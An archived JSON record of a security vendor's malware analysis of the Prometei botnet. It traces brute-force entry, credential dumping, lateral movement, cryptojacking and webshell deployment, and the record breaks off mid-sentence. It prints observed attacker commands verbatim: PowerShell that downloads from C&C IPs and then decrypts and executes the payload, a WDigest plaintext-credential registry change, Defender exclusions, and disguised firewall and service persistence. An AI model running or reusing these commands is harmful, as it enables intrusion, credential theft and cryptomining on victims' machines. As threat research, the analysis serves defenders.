{
	"id": "7b92fc93-c082-460e-b0d8-af01af218c27",
	"created_at": "2026-04-06T00:21:11.358678Z",
	"updated_at": "2026-04-10T03:30:57.244314Z",
	"deleted_at": null,
	"sha1_hash": "127d85bb2f93bc1c23c229f18e99518932c70640",
	"title": "Unmasking Prometei A Deep Dive Into Our MXDR Findings",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2501201,
	"plain_text": "Unmasking Prometei A Deep Dive Into Our MXDR Findings\r\nPublished: 2024-10-23 · Archived: 2026-04-05 16:08:26 UTC\r\nCyber Threats\r\nHow does Prometei insidiously operate in a compromised system? This Managed Extended Detection and Response\r\ninvestigation conducted with the help of Trend Vision One provides a comprehensive analysis of the inner workings of this\r\nbotnet so users can stop the threat in its tracks before it inflicts damage to the system.\r\nBy: Buddy Tancio, Bren Matthew Ebriega, Mohamed Fahmy Oct 23, 2024 Read time: 15 min (4143 words)\r\nKey Takeaways\r\nThe botnet Prometei was used in an attempt to infiltrate a customer’s system through what appeared to be a targeted\r\nbrute force attack.\r\nOur Managed Extended Detection and Response investigation leveraged Trend Vision One and its response actions to\r\ndetect and mitigate the attack proactively.\r\nAs we gained a bird’s eye view of Prometei’s stealthy tactics, we traced and illustrated the botnet’s detailed\r\ninstallation routine.\r\nIntroduction\r\nIn a recent Managed Extended Detection and Response (MXDR) investigation, we analyzed a case involving the spread of\r\nthe Prometei botnet across a customer's environment, the malicious activity detected with the help of Trend Vision Oneone-platform. Prometei functions as part of a larger botnet, enabling attackers to remotely control infected machines, deploy\r\nmalware, and coordinate attacks.\r\nThe Prometei botnet, reportedly dating back to as far back as 2016open on a new tab and updated to version 3 in late\r\n2022open on a new tab, is a modular malware family used primarily for cryptocurrency miningnews article (especially\r\nMonero) and credential theft. By early 2023, it had compromised over 10,000 systems globally, with significant activity in\r\nBrazil, Indonesia, and Turkey. The threat actors use a domain generation algorithm (DGA) as command-and-control (C\u0026C)\r\ninfrastructure and incorporate self-updating features for evasion.\r\nPrometei spreads by exploiting vulnerabilities like BlueKeep (CVE-2019-0708)news article and Microsoft Exchange Server\r\nvulnerabilities (CVE-2021-27065 and CVE-2021-26858), alongside using PowerShell scripts to retrieve payloads. Recent\r\nreports indicate it uses a bundled Apache Web Server with a PHP web shell for persistence. The botnet downloads\r\ncompressed archives which contain various components, which are then used to maintain control over infected devices and\r\nadapt quickly to defensive measures.\r\nThis blog will dive into our team's in-depth analysis of a Prometei sample (version 3.22). We'll examine the full scope of its\r\ninfiltration, tracing its path from initial access up to its concluding phases within the targeted network.\r\nInitial Access\r\nOur investigation began when we noticed a series of suspicious login attempts marked by multiple failed authentication\r\nrequests originating from two external IP addresses: 196[.]7[.]210[.]6 and 196[.]7[.]209[.]178. This activity immediately\r\nraised red flags as it suggested a potential brute force attack targeting the network. Our threat intelligence shows that both\r\nexternal IPs are associated with Prometei.\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 1 of 18\n\nFigure 1. Brute force attack on the target machine\r\nBoth IPs '196[.]7[.]210[.]6' and ‘196[.]7[.]209[.]178’ shown a strong relationship to Prometei infrastructure. Direct\r\nrelationship with one level pivoting between IPs and previously reported Prometei samples. Identifying attack campaign\r\nhelp response and continue such attacks and provide more insight about how to be handling it. \r\nFigure 2: Relationship between IPs observed and Prometei Malware\r\nIPs are hardcoded inside many Prometei variants which consider as a strong and valid relationship.\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 2 of 18\n\nFigure 3: Hardcoded IP inside Prometei variant\r\nAfter detecting several failed login attempts, we observed a successful login to the machine. Prometei spreads in the system\r\nby exploiting vulnerabilities in Remote Desktop Protocol (RDP) and Server Message Block (SMB).\r\nFigure 4. Successful initial entry for Prometei\r\nFollowing this activity, several files were created on the compromised system:\r\nC:\\Windows\\uplugplay\r\nC:\\Windows\\netwalker\r\nC:\\Windows\\updates1.7z\r\nC:\\Windows\\updates2.7z\r\nC:\\Windows\\mshlpda32.dll\r\nC:\\Windows\\7z.exe\r\nThese files were dropped in the directories C:\\Windows\\dell\\ and C:\\Windows\\. The 7-Zip archiving tool (7z.exe) was then\r\nused to extract the contents of the updates1.7z archive, which contained similar data to the updates2.7z archive. The\r\nfollowing files were extracted:\r\nsqhost.exe\r\nlibssp-0.dll\r\nlibcrypto-1_1.dll\r\nwindrlver.exe\r\nmiWalk64.exe\r\nmiWalk32.exe\r\nFigure 5. 7z.exe file used to extract contents of updates1.7z and updates2.7z\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 3 of 18\n\nThe sqhost.exe file is the main botnet binary responsible for dropping additional components and connecting to various\r\nC\u0026C servers to download more files. It is either renamed and copied to C:\\Windows\\zsvc.exe or retains the filename\r\nC:\\Windows\\sqhost.exe. It executes commands that manipulate system services and rules, including adding a firewall rule to\r\nallow traffic for sqhost.exe and configuring the UPlugPlay service to auto-start. These actions enable the malware to persist\r\nacross reboots and evade detection.\r\nC:\\Windows\\System32\\cmd.exe /C netsh advfirewall firewall add rule name=\"Secure Socket Tunneling Protocol\r\n(HTTP)\" dir=in action=allow program=\"c:\\windows\\sqhost.exe\" enable=yes\u0026netsh firewall add allowedprogram\r\nc:\\windows\\sqhost.exe \"Secure Socket Tunneling Protocol (HTTP)\" ENABLE\r\nC:\\Windows\\System32\\cmd.exe cmd.exe /C sc start UPlugPlay\r\nC:\\Windows\\System32\\cmd.exe /C ren C:\\windows\\zsvc.exe sqhost.exe\r\nC:\\Windows\\System32\\cmd.exe /C sc config UPlugPlay start= auto\r\nC:\\Windows\\System32\\cmd.exe /C reg add\r\n\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\UPlugPlay\" /v ImagePath /f /t REG_EXPAND_SZ\r\n/d \"c:\\windows\\sqhost.exe Dcomsvc\"\r\nC:\\Windows\\System32\\cmd.exe /C sc delete UPlugPlay\u0026sc create UPlugPlay binPath= \"c:\\windows\\sqhost.exe\r\nDcomsvc\" type= own DisplayName= \"UPlug\r\ncmd.exe /c sc query UPlugPlay\r\nC:\\Windows\\System32\\cmd.exe /C copy /y \"c:\\windows\\zsvc.exe\" C:\\windows\r\nCredential Dumping\r\nWe uncovered a command that re-enabled plaintext credential storage in the system's memory by modifying the WDigest\r\nauthentication protocol. While WDigest is typically disabled in modern Windows systems for security, the attackers used the\r\nUseLogonCredential setting to force the system to store passwords in clear text.\r\n\"C:\\Windows\\System32\\cmd.exe\" /C reg add\r\n\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\" /v UseLogonCredential /f\r\n/t REG_DWORD /d 1\r\nThe file C:\\Windows\\dell\\miwalk.exe harvested credentials from compromised machines and dumped them into\r\nC:\\Windows\\dell\\ssldata2.dll. This dumped file was laterally transferred as the threat propagated across the network along\r\nwith other malicious components.\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 4 of 18\n\nFigure 6. miWalk.exe file harvesting credentials and dumping them into ssldata2.dll\r\nWe detected a command that used PowerShell to configure Windows Defender to exclude the C:\\Windows and\r\nC:\\Windows\\Dell directories, allowing malicious files to evade detection.\r\ncmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -\r\nExclusionPath \"C:\\Windows\"\u0026powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath \"C:\\Windows\\Dell\"\r\nFigure 7. powershell.exe file used to evade detection\r\nLateral Movement\r\nFor lateral movement and remote execution, WMI Provider Host (wmiprvse.exe) was used. Its presence as a parent process\r\nindicates that the scripts were initiated by a WMI operation. A series of Base64-encoded payloads were written to files at\r\nC:\\windows\\*.b64 using either “WriteAllText” or “AppendAllText”. Although the script doesn't decode or execute the\r\ncontents immediately, it stores the encoded data for potential future actions..\r\npowershell [io.file]::AppendAllText('C:\\windows\\uplugplay.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::AppendAllText('C:\\windows\\updates1.7z.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::AppendAllText('C:\\windows\\updates2.7z.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::AppendAllText('C:\\windows\\7z.dll.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::AppendAllText('C:\\windows\\7z.exe.b64','\u003cBase64_encoded_string\u003e');\r\n powershell [io.file]::AppendAllText('C:\\windows\\winhlpx64.exe.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::AppendAllText('C:\\Windows\\zsvc.exe.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::WriteAllText('C:\\windows\\uplugplay.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::WriteAllText('C:\\windows\\updates1.7z.b64', '\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::WriteAllText('C:\\windows\\updates2.7z.b64', '\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]:: WriteAllText ('C:\\windows\\7z.dll.b64','\u003cBase64_encoded_string\u003e');\r\npowershell  [io.file]::WriteAllText('C:\\windows\\netwalker.b64', '\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]:: WriteAllText ('C:\\windows\\winhlpx64.exe.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]:: WriteAllText ('C:\\Windows\\zsvc.exe.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::WriteAllText('C:\\windows\\ssldata2.dll.b64',' \u003cBase64_encoded_string\u003e');\r\nNext, a script decodes the Base64-encoded files (*.b64), writes the decoded data to a new file, deletes the original encoded\r\nfile, and outputs the size of the new file. This technique deploys the obfuscated content. For example, the file\r\n“uplugplay.b64” is decoded into “uplugplay”.\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 5 of 18\n\nprocessCmd: powershell $f='C:\\windows\\uplugplay.b64';$o='C:\\windows\\uplugplay';$data=\r\n[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($f));[io.file]::WriteAllBytes($o,$data);Remove-Item\r\n$f;Write-Host (Get-Item $o).length;\r\nFigure 8. PowerShell decoded the Base64-encoded files (*.b64 file extension) to a new file.\r\nSimilar commands were detected for other files, which were created in the following directories:\r\nC:\\Windows\\7z.dll\r\nC:\\Windows\\7z.exe\r\nC:\\Windows\\mshlpda32.dll\r\nC:\\Windows\\netwalker.b64\r\nC:\\Windows\\ssldata2.dll\r\nC:\\Windows\\updates1.7z\r\nC:\\Windows\\updates2.7z\r\nC:\\Windows\\uplugplay.b64\r\nC:\\Windows\\winhlpx64.exe\r\nC:\\Windows\\zsvc.exe\r\nDownloading of Additional Components\r\nA command retrieves a file from http://103.40[.]123[.]34/k.php?B=_AMD64,PSDN0020,504K45A188441R4UE, saving it\r\nas C:\\windows\\zsvc.exe. The script then reads zsvc.exe, applies a custom XOR-based decryption routine, and executes the\r\ndecrypted file using the PowerShell cmdlet 'Start-Process.'\r\ncmd /C echo 123\u003eC:\\Windows\\mshlpda32.dll\u0026powershell $p='C:\\windows\\zsvc.exe';(New-Object\r\nNet.WebClient).DownloadFile('http://103.40.123.34/k.php?B=_AMD64,PSDN0020,504K45A188441R4UE',$p);$d=\r\n[IO.File]::ReadAllBytes($p);$t=New-Object Byte[]($d.Length);[int]$j=0;for([int]$i=0;$i -lt $d.Length;$i++)\r\n{$j+=66;$t[$i]=(($d[$i] -bxor ($i*3 -band 255))-$j) -band 255;}[io.file]::WriteAllBytes($p,$t);Start-Process $p;\r\nSqhost.exe then connects to the external IP address 88.198.246[.]242 to download prometei.cgi, a PowerShell script for\r\nretrieving additional modules.\r\nFigure 9. Sqhost.exe connection to 88.198.246[.]242\r\nAs we probed deeper into the activities of the sqhost.exe process, we found that it performed a series of actions to further its\r\ngoals. First, it checked for the file 7z.dll. If it wasn't there, sqhost.exe downloaded 7z32.dll from\r\nhttp://103.41.204[.]104/7z32.dll. This file is part of the 7-Zip tool used for file management.\r\nNext, it looked for 7z.exe. If that file was missing, it retrieved 7z32.exe from the same URL. Finally, regardless of whether it\r\nfound the previous files, sqhost.exe downloaded std.7z from http://103.41.204[.]104/std2.7z, which contained additional\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 6 of 18\n\ncomponents needed for the attack.\r\npowershell.exe \"if(-not (Test-Path '7z.dll')) {(New-Object\r\nNet.WebClient).DownloadFile('http://103[.]41[.]204[.]104/7z32.dll','7z.dll');}if(-not (Test-Path '7z.exe')) {(New-Object\r\nNet.WebClient).DownloadFile('http://103.41.204[.]104/7z32.exe','7z.exe');} (New-Object\r\nNet.WebClient).DownloadFile('http://103.41.204[.]104/std2.7z','std.7z');\"\r\nFigure 10. PowerShell downloads additional files from 103[.]41[.]204[.]104\r\nCommands were observed checking the SHA1 of downloaded files to ensure their integrity by verifying the cryptographic\r\nhash.\r\nsqhost.exe /sha1chk 962F3D0B35B9FF68CDBA31A039EAD12B5789E7F6.std.7z\r\nsqhost.exe /sha1chk 344FAF61C3EB76F4A2FB6452E83ED16C9CCE73E0 7z.dll\r\nsqhost.exe /sha1chk 20FEA1314DBED552D5FEDEE096E2050369172EE1 7z.exe\r\nThe obtained 7zip tool was then utilized to extract the downloaded archives, namely std.7z or std2.7z.\r\n\"C:\\Windows\\dell\\7z.exe\" x std.7z -phorhor123 -y\r\nAnother script was found downloading walker.ini from a remote server to C:\\windows\\dell. The chkxwget command in\r\nsqhost.exe likely handles web-based downloads.\r\n\"C:\\Windows\\System32\\cmd.exe\" /c C:\\windows\\sqhost /chkxwget http://103.41.204[.]104/dwn.php?d=walker.ini\r\nC:\\windows\\dell\\walker.ini\r\nThe file “Socks.exe” handles RDP communication. It processes .cpass files containing potential passwords, attempts RDP\r\nlogins, and saves successful credentials to a .cpass_good file.\r\nFigure 11. rdcIip.exe reads the contents of .cpass\r\nA command collected system info via “systeminfo” and logged it to setup_gitlog.txt in C:\\Windows\\temp, followed by a\r\nping to Google's DNS (8.8.8.8), logging the results to the same file.\r\n\"C:\\Windows\\System32\\cmd.exe\" /c systeminfo\u003e\u003eC:\\Windows\\temp\\setup_gitlog.txt\u0026ping\r\n8.8.8.8\u003e\u003eC:\\Windows\\temp\\setup_gitlog.txt\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 7 of 18\n\nPropagation Method\r\nWe identified the following botnets and their primary spreading module, which are responsible for distributing the Prometei\r\nacross the network:\r\nC:\\Windows\\winhlpx64.exe\r\nC:\\Windows\\dell\\rdpcIip.exe\r\nWe also encountered a suspicious command involving the execution of a binary file located in C:\\Windows\\dell\\rdpcIip.exe.\r\nThis file is associated with a Base64-encoded string, which, upon decoding, revealed binary data likely indicating a\r\npotentially malicious executable.\r\nEncoded:\r\n\"C:\\Windows\\dell\\rdpcIip.exe\" stat goodDKEST596AVIX7H8Z6scCw9coJGnHm0LKfZ+f8e1NRPLcpEhf4yr+mX0=\r\nDecoded:\r\n'\\x1d\\x0c\\x12Oz\\x01R\\x17\\x7f\\x19\\x02($iǛB}MDܤH_*}'\r\nrdpclip.exe connected to the following IP addresses:\r\n187[.]79.243.171\r\nIt then created the following file which appears to be a configuration or data file, potentially related to the botnet's\r\ncommunication with external servers.\r\nC:\\Windows\\dell\\net196[.]7.210.160.map\r\nThe executables with the “nethelper” names are .NET-based assemblies for lateral movement that attempt to locate and\r\nconnect to any SQL servers found in the network environment. Upon successful connection, the executables attempt to\r\ninstall sqhost.exe onto the server. This was spawned by ‘C:\\Windows\\dell\\rdpcIip.exe’.\r\n\"C:\\Windows\\dell\\nethelper4.exe\" 103.41.204[.]104 10.0.0.254:443 2AA19BFA\r\n\"C:\\Windows\\dell\\nethelper4.exe\" 103.41.204[.]104 10.17.0.42:5432 \"C:\\Windows\\dell\\10.17.0.42\"\r\nSSH Connections\r\nWe detected suspicious SSH (Secure Shell) connections from the compromised environment, with \"windrlver.exe\" initiating\r\nconnections to external IPs on port 22. This activity suggests attackers may have gained elevated access and are using secure\r\nprotocols to conceal remote operations, like uploading sensitive files or executing commands.\r\n\"C:\\windows\\dell\\windrlver.exe\" ssh 180.169.1[.]207:22 \"C:\\windows\\dell\\180.169.1.207\" 155.207.200.242 HV\r\n\"C:\\Windows\\dell\\windrlver.exe\" ssh 10.17.0[.]254:22 \"C:\\Windows\\dell\\10.17.0.254\" 103.41.204.104 HL\r\n\"C:\\windows\\dell\\windrlver.exe\" ssh 134.88.5[.]200:22 \"C:\\windows\\dell\\134.88.5.200\" 103.40.123.34 HV\r\n\"C:\\windows\\dell\\windrlver.exe\" ssh 187.133.137[.]81:22 \"C:\\windows\\dell\\187.133.137.81\" 103.40.123.34 HV\r\nCryptojacking\r\nThe affected machines connect to a mining pool server which can be used to mine cryptocurrencies (Monero) on\r\ncompromised machines without the victim's knowledge. This type of activity is often classified as cryptojacking, where\r\nattackers exploit the systems’ resources to generate cryptocurrency.\r\np2.feefreepool[.]net           88.198.246[.]242:80\r\nThe cryptocurrency mining payload, downloaded as “srch.7z,” is saved as “SearchIndexer.exe.” The command first checks\r\nfor SearchIndexer.exe using PowerShell; if it’s missing, it downloads srch.7z from http://103.41.204[.]104. After\r\ndownloading, it verifies the SHA-1 checksum against the expected hash\r\n(9280B1466527CB5B22C77C6CF42A3085A68DD326) using sqhost.exe. If the checksum matches, it extracts the contents\r\nof srch.7z with the password \"horhor123\" and deletes the original archive to erase traces.\r\n\"C:\\Windows\\System32\\cmd.exe\" /C powershell.exe \"if(-not (Test-Path 'SearchIndexer.exe')) {(New-Object\r\nNet.WebClient).DownloadFile('http://103.41.204.104/srch.7z','srch.7z');}\"\u0026sqhost.exe /sha1chk\r\n9280B1466527CB5B22C77C6CF42A3085A68DD326 srch.7z\u00267z x srch.7z -phorhor123 -y\u0026del srch.7z\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 8 of 18\n\nFigure 12. SearchIndexer.exe was extracted into the disk\r\nThe miner configuration attributes are provided by the C\u0026C through a downloaded text file named “desktop.txt”, written to\r\ndisk at “C:\\Windows\\dell\\desktop.dat”.\r\n\"C:\\Windows\\System32\\cmd.exe\" /c powershell.exe \"$d=\r\n[System.Convert]::FromBase64String('LW8gc3RyYXR1bSt0Y3A6Ly8xNDUuMjM5LjIwMC45MjozMzMzIC0tZG9uYXRlLWxldmVsIDEgLXAg\r\n[io.file]::WriteAllBytes('C:\\Windows\\dell\\Desktop.dat',$d);\"\r\nDecoded:\r\n-o stratum+tcp://145.239.200.92:3333 --donate-level 1 -p x -u id\r\nThe SearchIndexer.exe, masquerading as the legitimate Windows Search Indexer, mines cryptocurrency by connecting to a\r\nmining pool via the Stratum protocol on port 3333, with a donation level set to 1.\r\n\"C:\\Windows\\dell\\SearchIndexer.exe\" -o stratum+tcp://142.4.205[.]155:80 --donate-level 1 -p x -u id\r\n\"C:\\Windows\\dell\\SearchIndexer.exe\" -o stratum+tcp://89.163.213[.]192:3333 --donate-level 1 -p x -u id\r\n\"C:\\Windows\\dell\\SearchIndexer.exe\" -o stratum+tcp://145.239.200[.]92:3333 --donate-level 1 -p x -u id\r\nDomain Generation Algorithm (DGA)\r\nThe observed domains indicate the use of a DGA for alternative C\u0026C infrastructure. DGAs create numerous random domain\r\nnames, enabling Prometei to communicate with an attacker’s server even if some domains are blocked. In this case, the\r\ndomains follow a consistent pattern (starting with \"xinchaocace\" and \"xinchaobjce\") with various suffixes (.com, .net, .org).\r\nThese dynamically generated domains complicate effective domain-based blocking, suggesting that the malware is using\r\nDGA to evade detection and maintain control over the infected network.\r\nxinchaocacebm[.]com xinchaocacebd[.]com xinchaobjcebl[.]com xinchaobjcebj[.]net\r\nxinchaocacebp[.]net xinchaocacebi[.]net xinchaobjcebi[.]net xinchaobjcebe[.]org\r\nxinchaocacebo[.]org xinchaocacebd[.]net xinchaobjcebn[.]org xinchaobjcebk[.]com\r\nxinchaocacebi[.]com xinchaocacebj[.]com xinchaobjcebb[.]com Xinchaobjcebf[.]com\r\nAdditionally, we detected the use of the nslookup command querying the randomly generated domain names through\r\nGoogle’s DNS server (8.8.8.8), to attempt to resolve a C\u0026C server used by the attackers.\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 9 of 18\n\nFigure 13. Nslookup querying the randomly generated domain\r\nFigure 14. Sqhost.exe activity detected by Vision 1 Execution Profile\r\nDeployment of Web Shells\r\nIt was also observed that sqhost.exe executed a series of PowerShell commands to download and configure an Apache web\r\nserver, which acts as a WebShell for malicious activity.\r\n\"C:\\Windows\\System32\\cmd.exe\" /C del C:\\Windows\\dell\\AppServ.zip\u0026powershell.exe -nologo -noprofile -command\r\n\"new-item C:\\Windows\\dell -itemtype directory;if(-not (Test-Path 'C:\\windows\\dell\\7z.dll')) {(New-Object\r\nNet.WebClient).DownloadFile('http://103.41.204[.]104/7z32.dll', 'C:\\Windows\\dell\\7z.dll');}if(-not (Test-Path\r\n'C:\\windows\\dell\\7z.exe')) {(New-Object Net.WebClient).DownloadFile('http://103.41.204.104/7z32.exe',\r\n'C:\\Windows\\dell\\7z.exe');}if(-not (Test-Path 'C:\\ProgramData\\Microsoft\\AppServ\\www\\index.php')) {(New-Object\r\nNet.WebClient).DownloadFile('http://45.194.35[.]180:180/AppServ180.zip', 'C:\\Windows\\dell\\AppServ.zip');} new-item\r\nC:\\ProgramData\\Microsoft\\AppServ -itemtype directory;new-item C:\\ProgramData\\Microsoft\\AppServ\\cgi-bin -itemtype\r\ndirectory\"\u0026sqhost.exe /sha1chk 20FEA1314DBED552D5FEDEE096E2050369172EE1\r\nC:\\windows\\dell\\7z.exe\u0026sqhost.exe /sha1chk 344FAF61C3EB76F4A2FB6452E83ED16C9CCE73E0\r\nC:\\windows\\dell\\7z.dll\u0026sqhost.exe /sha1chk de16ad97be7fefcd7b830413e7d4d56ef96fb02b\r\nC:\\windows\\dell\\AppServ.zip\u0026C:\\windows\\dell\\7z x C:\\Windows\\dell\\AppServ.zip -oC:\\ProgramData\\Microsoft\\AppServ -\r\ny\r\nHere's a breakdown of the script:\r\nDeletes the file AppServ.zip from the C:\\Windows\\dell directory, possibly to remove traces of a previous attempt\r\nPowerShell is used to create the directories C:\\Windows\\dell and C:\\ProgramData\\Microsoft\\AppServ if they don't\r\nexist yet\r\nIt then downloads several files if they are not available already:\r\n7z32.dll (from http://103.41.204[.]104/7z32.dll)\r\n7z32.exe (from http://103.41.204[.]104/7z32.exe)\r\nAppServ180.zip (from http://45.194.35[.]180:180/AppServ180.zip)\r\nThe command verifies the integrity of these downloaded files using SHA-1 checksums to ensure they match:\r\n7z.exe: 20FEA1314DBED552D5FEDEE096E2050369172EE1\r\n7z.dll: 344FAF61C3EB76F4A2FB6452E83ED16C9CCE73E0\r\nAppServ.zip: de16ad97be7fefcd7b830413e7d4d56ef96fb02b\r\nIt then uses 7z.exe to extract the AppServ.zip archive into the directory C:\\ProgramData\\Microsoft\\AppServ.\r\nWe observed a PowerShell command that renames the file ssimple.php to a randomly generated name in the format Shell-followed by a 12-character string (e.g., Shell-abc123def456.php). This randomization helps attackers evade detection and\r\nmakes it more difficult for security teams to track the web shell on the compromised system.\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 10 of 18\n\ncmd.exe /C powershell \"$chars = 'abcdefghijkmnopqrstuvwxyz123456789'.ToCharArray(); $rnd=''; 1..12 | ForEach {\r\n$rnd+=$chars | Get-Random }; $s='Shell-'+$rnd+'.php';$r='C:\\ProgramData\\Microsoft\\AppServ\\www\\'+$s;Rename-Item -\r\nPath 'C:\\ProgramData\\Microsoft\\AppServ\\www\\ssimple.php' -NewName $r; Write-Host $s;  \r\nA new Windows service, ‘KtmRmSvc,’ was created with a binary path to taskhost.exe\r\n(C:\\ProgramData\\Microsoft\\AppServ\\Apache2.2\\bin), configured to start automatically at boot. This establishes persistence,\r\nenabling taskhost.exe to maintain control over the compromised system and allowing continuous access through the Web\r\nShell.\r\ncmd.exe /C sc create KtmRmSvc binPath= \"C:\\ProgramData\\Microsoft\\AppServ\\Apache2.2\\bin\\taskhost.exe -k runservice\"\r\nstart= auto\r\nCommands were observed adding new firewall rules to establish an Apache web server while disguising themselves as\r\ntaskhost.exe. They allow incoming traffic for taskhost.exe under the misleading name \"Secure Socket Tunneling Protocol\r\n(HTTP)\" and reinforce this by permitting the executable through the firewall. The commands also copy the PHP\r\nconfiguration file (php.ini) to C:\\Windows for accessibility and start the KtmRmSvc service to run taskhost.exe. This\r\noperation aims to obfuscate malicious activity while maintaining control over the compromised system and facilitating\r\ncommunication with the attacker’s server.\r\nnetsh advfirewall firewall add rule name=\"Secure Socket Tunneling Protocol (HTTP)\" dir=in action=allow\r\nprogram=\"C:\\ProgramData\\Microsoft\\AppServ\\Apache2.2\\bin\\taskhost.exe\" enable=yes\u0026netsh firewall add \r\nallowedprogram C:\\ProgramData\\Microsoft\\AppServ\\Apache2.2\\bin\\taskhost.exe \"Secure Socket Tunneling Protocol\r\n(HTTP)\" ENABLE\u0026copy C:\\ProgramData\\Microsoft\\AppServ\\php5\\php.ini C:\\Windows\u0026sc start KtmRmSvc\r\nFigure 15. Sqhost.exe activity detected by Vision One execution profile\r\nThrough Trend Vision Oneone-platform's response actions, we successfully obtained a sample of the archive\r\n'AppServ180.zip,' which contains the WebShell. To gain a better understanding of its functionality, we analyzed the files\r\nwithin the archive.\r\nThe archive includes three main directories:\r\nApache2.2: A portable version of the Apache webserver\r\nphp5: A portable PHP installation\r\nwww: A directory housing the webshell file (ssimple.php or Shell-{random}.php)\r\nUpon analyzing the WebShell (ssimple.php/Shell-{random}.php), we identified two key capabilities:\r\nCommand Execution: The WebShell can execute arbitrary commands on the server using PHP's system() function.\r\nFile Upload: It facilitates the upload of files to the compromised server.\r\nThis combination of capabilities gives attackers remote control over the server and the ability to upload additional malicious\r\nfiles.\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 11 of 18\n\nFigure 16. Screenshot of the Web Shell’s capability\r\nTor Connections\r\nThe command involving C:\\Windows\\dell\\msdtc.exe attempts to connect to a remote Tor-based .onion URL using a Base64-\r\nencoded string that decodes to a Prometei-related address for establishing a C\u0026C connection. This is paired with\r\nSmcard.exe, a Tor relay that links the infected system to the Tor network and initiates a SOCKS proxy on localhost ports\r\n9001 and 443.\r\nEncoded:\r\nmsdtc.exe\r\naHR0cHM6Ly9nYjduaTVyZ2VleGRjbmNqLm9uaW9uL2NnaS1iaW4vcHJvbWV0ZWkuY2dpP3I9OSZpPU44UTRZOTBPOVRUNDZNWEc=\r\nmsdtc.exe\r\naHR0cHM6Ly9nYjduaTVyZ2VleGRjbmNqLm9uaW9uL2NnaS1iaW4vcHJvbWV0ZWkuY2dpP3I9MyZpPTlBRjJIWUoyNDBJRlI0VUc=\r\nmsdtc.exe\r\naHR0cHM6Ly9nYjduaTVyZ2VleGRjbmNqLm9uaW9uL2NnaS1iaW4vcHJvbWV0ZWkuY2dpP3I9MyZpPTQ2VjI3OUFJTjUzSDUyUVo=\r\nDecoded:\r\nhttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi?r=9\u0026i=N8Q4Y90O9T4MXH\r\nhttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi?r=3\u0026i=9AF2HYJ240IFR4UG\r\nFigure 17. msdtc.exe, which attempts to reach out to a remote .onion URL\r\nSmcard.exe acts as a Tor relay, connecting the compromised system to the TOR network and establishing a SOCKS proxy\r\non localhost ports 9001 and 443.\r\n\"C:\\Windows\\dell\\smcard.exe\" --nt-service \"-f\" \"C:\\Windows\\dell\\torrc\"\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 12 of 18\n\nFigure 18. Smcard.exe acts as a TOR relay\r\nPrometei Installation Routine\r\nTo sum up, the Prometei installation routine, as well as the details of its associated files, are as follows:\r\nFigure 19. Prometei installation routine\r\nzsvc.exe/sqhost.exe (as the installer)\r\nFunctions as the initial installer for the botnet when executed without commands.\r\nThe sample is initially packed using UPX and employs a custom packer to unpack its main botnet code.\r\nThe custom packer checks for the presence of the file “mshlpda32.dll” in the system:\r\nIf absent, it performs the following decoy actions:\r\nCreate the file C:\\Windows\\Temp\\setup_gitlog.txt.\r\nExecute the command: C:\\Windows\\System32\\cmd.exe /c\r\nsysteminfo\u003e\u003eC:\\Windows\\temp\\setup_gitlog.txt\u0026ping 8.8.8.8\u003e\u003eC:\\Windows\\temp\\setup_gitlog.txt\r\nTerminates the current process.\r\nIf present, it unpacks the main botnet code by:\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 13 of 18\n\nReading one byte of the external file.\r\nUsing the obtained byte to decrypt the main botnet code via XOR.\r\nOnce the main botnet code is unpacked, the sample will perform checks to see if the botnet has already been installed\r\nin the system or not:\r\nWhen installing itself with admin rights it will do the following:\r\nCreate the “C:\\Windows\\dell” folder where the botnet will store its downloaded modules.\r\nCreate the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\Support. This registry key 